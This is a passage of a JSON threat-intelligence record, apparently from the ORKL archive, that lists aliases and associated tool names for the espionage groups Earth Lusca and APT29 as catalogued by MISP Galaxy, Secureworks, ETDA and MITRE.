			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434174,
	"ts_updated_at": 1775826693,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.pdf",
		"text": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.txt",
		"img": "https://archive.orkl.eu/ae59e3a21c3da214423167f397d741426dbfd9c3.jpg"
	}
}